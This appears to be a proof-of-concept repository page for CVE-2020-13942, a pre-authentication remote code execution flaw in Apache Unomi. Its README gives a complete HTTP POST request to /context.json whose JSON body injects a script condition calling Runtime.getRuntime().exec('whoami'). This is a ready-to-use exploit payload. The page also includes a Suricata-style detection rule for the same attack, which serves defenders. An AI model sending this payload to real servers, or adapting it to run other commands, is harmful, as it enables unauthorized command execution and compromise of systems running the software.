CVE-2020-13942 PoC — Remote Code Execution in Apache Unomi

Source

Associated Vulnerability

Readme

# CVE-2020-13942 Apache Unomi pre-auth RCE

***CVE-2020-13942 exploit***

POST /context.json HTTP/1.1

Host: x.x.x.x

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/json

Content-Length: 200


{"filters":[{"id" : "test","filters": [{"condition": {"parameterValues": {"test": "script::Runtime.getRuntime().exec('whoami')"},"type":"profilePropertyCondition"}}]}],"sessionId": "test"}

***CVE-2020-13942 Detection rules***

alert http any any -> any any (msg:"ET EXPLOIT CVE-2020-13942 Apache Unomi pre-auth RCE"; flow:established,to_server; content:"POST"; http_method; content:"/context.json"; http_uri; content:"Runtime.getRuntime()"; http_client_body; nocase; content:".exec("; http_client_body; nocase; reference:url,twitter.com/chybeta/status/1328912309440311297; reference:cve,2020-13942; classtype:attempted-admin; sid:2031120; rev:2; metadata:affected_product Web_Server_Applications, attack_target Client_Endpoint, created_at 2020_11_18, former_category EXPLOIT, signature_severity Major, updated_at 2020_11_18;)

File Snapshot

 [4.0K]  /data/pocs/e077f0f8356b270d53e40aea61e8546c25edf227
└── [1.1K]  README.md

0 directories, 1 file

Remarks